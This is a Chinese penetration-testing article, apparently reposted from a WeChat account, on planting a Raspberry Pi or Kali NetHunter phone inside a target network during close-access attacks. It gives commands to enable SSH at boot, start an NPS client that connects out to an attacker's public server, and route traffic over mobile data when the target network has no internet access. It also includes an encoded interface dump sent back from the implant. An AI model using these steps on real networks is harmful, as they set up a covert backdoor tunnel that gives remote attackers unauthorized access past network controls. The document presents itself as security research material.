移动设备:手机、平板、树莓派等
近源渗透:包括社会工程学、物理接近、无线电弱点
场景:攻击者通过社工或无线电弱点获得目标网络环境,但由于物理环境限制,需利用手段将网络环境转发,以便于远程攻击者利用网络环境进行攻击。
一、准备工作
1.安装了NPS服务端的公网服务器。
https://github.com/ehang-io/nps/
2.Kali NetHunter 或 树莓派
二、树莓派的流量转发
思路:
若目标内网不出网,网口接目标网络,WIFI接公网热点,使用WIFI网络连接公网服务器。
若目标内网出网,网口接目标网络,使用目标网络连接公网服务器。
目标内网出网:
1.设置ssh服务开机自启
update-rc.d ssh enable
ls -l /etc/systemd/system/multi-user.target.wants
2.设置开机自动连接公网服务器
连接命令:
npc -server=x.x.x.x:8024 -vkey=sc04k344dgh4gze8 -type=tcp
设置开机自启动
难点:没有显示器,插上网口后就完事了,谁能告诉攻击者网络环境情况呢
客户端智慧呼叫系统
eth0%3A+flags%3D4099%3CUP%2CBROADCAST%2CMULTICAST%3E++mtu+1500%0A++++++++ether+b8%3A27%3Aeb%3Ad1%3Ae1%3A02++txqueuelen+1000++%28Ethernet%29%0A++++++++RX+packets+0++bytes+0+%280.0+B%29%0A++++++++RX+errors+0++dropped+0++overruns+0++frame+0%0A++++++++TX+packets+0++bytes+0+%280.0+B%29%0A++++++++TX+errors+0++dropped+0+overruns+0++carrier+0++collisions+0%0A%0Alo%3A+flags%3D73%3CUP%2CLOOPBACK%2CRUNNING%3E++mtu+65536%0A++++++++inet+127.0.0.1++netmask+255.0.0.0%0A++++++++inet6+%3A%3A1++prefixlen+128++scopeid+0x10%3Chost%3E%0A++++++++loop++txqueuelen+1000++%28Local+Loopback%29%0A++++++++RX+packets+15++bytes+1937+%281.8+KiB%29%0A++++++++RX+errors+0++dropped+0++overruns+0++frame+0%0A++++++++TX+packets+15++bytes+1937+%281.8+KiB%29%0A++++++++TX+errors+0++dropped+0+overruns+0++carrier+0++collisions+0%0A%0Awlan0%3A+flags%3D4163%3CUP%2CBROADCAST%2CRUNNING%2CMULTICAST%3E++mtu+1500%0A++++++++inet+192.168.8.195++netmask+255.255.255.0++broadcast+192.168.8.255%0A++++++++inet6+fe80%3A%3A758c%3A50c%3Ad3e5%3A188c++prefixlen+64++scopeid+0x20%3Clink%3E%0A++++++++ether+b8%3A27%3Aeb%3A84%3Ab4%3A57++txqueuelen+1000++%28Ethernet%29%0A++++++++RX+packets+14++bytes+1233+%281.2+KiB%29%0A++++++++RX+errors+0++dropped+0++overruns+0++frame+0%0A++++++++TX+packets+14++bytes+2024+%281.9+KiB%29%0A++++++++TX+errors+0++dropped+0+overruns+0++carrier+0++collisions+0%0A%0A
目标内网不出网:
树莓派的WIFI连接手机热点
三、Kali Nethunter的流量转发
优点:便携、小巧、无噪音、有屏幕、可以摸鱼
思路:
目标内网不出网,WIFI连内网,手机流量连公网服务器。
目标内网出网,WIFI连内网,WIFI连公网服务器。
目标内网不出网:
1.设置保持移动网络开启
2.进入NetHunter终端
ip route show table 0 | grep default
ip route add table 255 x.x.x.x/24 via 【手机卡路由】dev rmnet_data0
目标内网出网:
连接WIFI后直接运行NPS客户端。
原文始发于微信公众号(Matrix1024):移动设备流量转发在近源渗透中的应用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论